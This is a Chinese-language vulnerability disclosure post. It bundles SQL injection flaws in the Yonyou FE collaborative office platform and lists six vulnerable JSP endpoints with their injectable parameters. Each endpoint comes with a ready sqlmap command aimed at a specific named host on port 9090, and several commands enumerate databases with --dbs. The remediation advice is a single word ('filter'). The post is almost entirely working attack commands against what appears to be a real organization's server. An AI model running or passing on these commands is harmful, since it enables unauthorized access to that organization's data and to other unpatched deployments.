用友通用系统漏洞打包之2

用友通用系统漏洞打包#2

 

看了一天的时间,把发现的漏洞一起打包了

总共包含用友FE协同办公平台通用系统漏洞打包,包含11个SQL注入漏洞,总不会都重复嘛

漏洞的文件及参数为:
 

1)sql注入1

/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync

sqlmap -u "http://oa.hzuf.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync"
 

1.jpg

2)sql注入2

/fenc/ncsubjass.jsp?subjcode=1

sqlmap -u "http://oa.hzuf.com:9090/fenc/ncsubjass.jsp?subjcode=1"
 

1.jpg

3)sql注入3

/document/file_publish_open.jsp?id=1

sqlmap -u "http://oa.hzuf.com:9090/document/file_publish_open.jsp?id=1"
 

1.jpg

4)sql注入4

/common/selectMoreOrganizeTree.jsp?id=1

sqlmap -u "http://oa.hzuf.com:9090/common/selectMoreOrganizeTree.jsp?id=1"
 

3.jpg

5)sql注入5

/cooperate/flow/loadInforData.jsp?guid=11

sqlmap -u "http://oa.hzuf.com:9090/cooperate/flow/loadInforData.jsp?guid=11"
 

1.jpg

6)sql注入6

/carManager/carUseDetailList.jsp?CAR_BRAND_NO=1

sqlmap -u "http://oa.hzuf.com:9090/carManager/carUseDetailList.jsp?CAR_BRAND_NO=1"
 

1.jpg

其他的就不一一例举出来了...

 

SQLMAP跑也的数据

sqlmap -u "http://oa.hzuf.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync" --dbs
 

2.jpg

sqlmap -u "http://oa.hzuf.com:9090/fenc/ncsubjass.jsp?subjcode=1"
 

2.jpg

sqlmap -u "http://oa.hzuf.com:9090/document/file_publish_open.jsp?id=1" --dbs
 

3.jpg

sqlmap -u "http://oa.hzuf.com:9090/cooperate/flow/loadInforData.jsp?guid=11" --dbs
 

2.jpg

 

修复方案:

过滤